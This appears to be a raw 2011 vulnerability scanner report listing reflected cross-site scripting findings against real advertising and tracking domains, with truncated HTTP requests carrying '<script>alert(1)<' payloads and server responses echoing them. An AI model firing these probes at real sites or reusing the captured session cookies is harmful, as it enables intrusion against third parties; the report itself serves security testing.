HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sun, 08 May 2011 15:37:47 GMT Vary: Accept-Encoding P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads Set-Cookie: ASB164=TX=1304955468&D10= Set-Cookie: ATV164=62547d163AJSc Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: BTASES=SID=7186BD565 Set-Cookie: BTA=GUID=4CEEBF00B42 Date: Mon, 09 May 2011 15:37:47 GMT Connection: close Content-Length: 4145 <script language=Javascript src="/ads_v2/script <SCRIPT LANGUAGE=Javascript ...[SNIP]... YXPIAQnaASBodHRwOi8v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bridgetrack |
Path: | /a/f/ |
GET /a/f/?BT_CON=200&BT_PID Host: ads.bridgetrack.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BTA144=; BTA=GUID=4CEEBF00B42 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sun, 08 May 2011 15:37:48 GMT Vary: Accept-Encoding P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads Set-Cookie: ASB164=TX=1304955468&D10= Set-Cookie: ATV164=62547d163AJSc Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: BTASES=SID=F4E325FEC Set-Cookie: BTA=GUID=4CEEBF00B42 Date: Mon, 09 May 2011 15:37:47 GMT Connection: close Content-Length: 4094 <script language=Javascript src="/ads_v2/script <SCRIPT LANGUAGE=Javascript ...[SNIP]... YXPIAQnaASBodHRwOi8v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bridgetrack |
Path: | /a/f/ |
GET /a/f/?BT_CON=200&BT_PID Host: ads.bridgetrack.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BTA144=; BTA=GUID=4CEEBF00B42 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sun, 08 May 2011 15:37:49 GMT Vary: Accept-Encoding P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads Set-Cookie: ASB164=TX=1304955470&D10= Set-Cookie: ATV164=24466d163AJUc Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: BTASES=SID=A46B821B0 Set-Cookie: BTA=GUID=4CEEBF00B42 Date: Mon, 09 May 2011 15:37:49 GMT Connection: close Content-Length: 4088 <script language=Javascript src="/ads_v2/script <SCRIPT LANGUAGE=Javascript ...[SNIP]... 7KvUDAAAARA&num=1&sig ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /PortalServe/ |
GET /PortalServe/?pid Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PRID=B313D3CD-2147-4ACC |
HTTP/1.1 200 OK Connection: close Date: Mon, 09 May 2011 15:39:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache document.write("<iframe id='profr1278576' src='http://ads.pointroll ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /PortalServe/ |
GET /PortalServe/?pid Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PRID=B313D3CD-2147-4ACC |
HTTP/1.1 200 OK Connection: close Date: Mon, 09 May 2011 15:39:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache document.write("<iframe id='profr1278576' src='http://ads.pointroll ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /PortalServe/ |
GET /PortalServe/?pid Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PRID=B313D3CD-2147-4ACC |
HTTP/1.1 200 OK Connection: close Date: Mon, 09 May 2011 15:39:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache document.write("<iframe id='profr1278576' src='http://ads.pointroll ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api-public.addthis |
Path: | /url/shares.json |
GET /url/shares.json?url=http Host: api-public.addthis.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=300 Content-Type: application/javascript Date: Mon, 09 May 2011 15:39:18 GMT Content-Length: 127 Connection: close _ate.cbs.sc_httpwwwc |
Severity: | High |
Confidence: | Certain |
Host: | http://ar.voicefive.com |
Path: | /b/rc.pli |
GET /b/rc.pli?func=COMSCORE Host: ar.voicefive.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ar_p91300630=exp=1 |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:35:34 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept Content-Length: 83 COMSCORE.BMX.Broker |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7b98a4<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:01 GMT Date: Mon, 09 May 2011 15:35:01 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"7b98a4<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:03 GMT Date: Mon, 09 May 2011 15:35:03 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"875cb<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:01 GMT Date: Mon, 09 May 2011 15:35:01 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"59648881f594<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:02 GMT Date: Mon, 09 May 2011 15:35:02 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... y{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"5964888", c3:"26a371<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:02 GMT Date: Mon, 09 May 2011 15:35:02 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... =[],f,b;a=a||_comscore COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"98da8<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:03 GMT Date: Mon, 09 May 2011 15:35:03 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... ;a=a||_comscore;for(b=a COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"5f82e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=25894b9d-24.143.206 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 16 May 2011 15:35:03 GMT Date: Mon, 09 May 2011 15:35:03 GMT Connection: close Content-Length: 1235 if(typeof COMSCORE=="undefined") ...[SNIP]... comscore;for(b=a.length-1 COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"631f9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader20f90"><script>alert(1)< Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:32 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 393 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader/ATT25f2a"><script>alert(1)< Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:34 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 392 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader/ATT/Wired19e49"><script>alert(1)< Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:36 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 393 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader/ATT/Wired Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:39 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 393 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader/ATT/Wired Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:41 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 392 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b3.mookie1.com |
Path: | /2/ZapTrader/ATT/Wired |
GET /2/ZapTrader/ATT/Wired Host: b3.mookie1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:43 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 384 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq <A HREF="http://b3.mookie1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:04 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4521 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... baseName] = bindings; } } // prototypes String.prototype return (new String(this.toLowerCase() } var te_clr1_att02cont38380f<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4121 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </div> \ \ '; var te_clr1_att02cont3_bi = {'baseName':'te-clr1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4029 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </div>\ '; var te_clr1_att02cont3_bi = {'baseName':'te-clr1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4029 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </div>\ '; var te_clr1_att02cont3_bi = {'baseName':'te-clr1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4029 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </div>\ '; var te_clr1_att02cont3_bi = {'baseName':'te-clr1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4120 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </div> \ \ '; var te_clr1_att02cont3_bi = {'baseName':'te-clr1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att02 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4029 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... overlay(te_clr1 var tecabaseurl = 'choices.truste.com'; truste.ca.addEvent(window if(!truste.defjsload) { var element = document.createElement( element.src = ' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /apps/insidepage/crc.ashx |
GET /apps/insidepage/crc.ashx Host: content.usatoday.com Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_lastvisit=1304954843536 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:38:56 GMT Content-Length: 132 commentcount98134<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fm.js |
GET /bar/v16-406/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
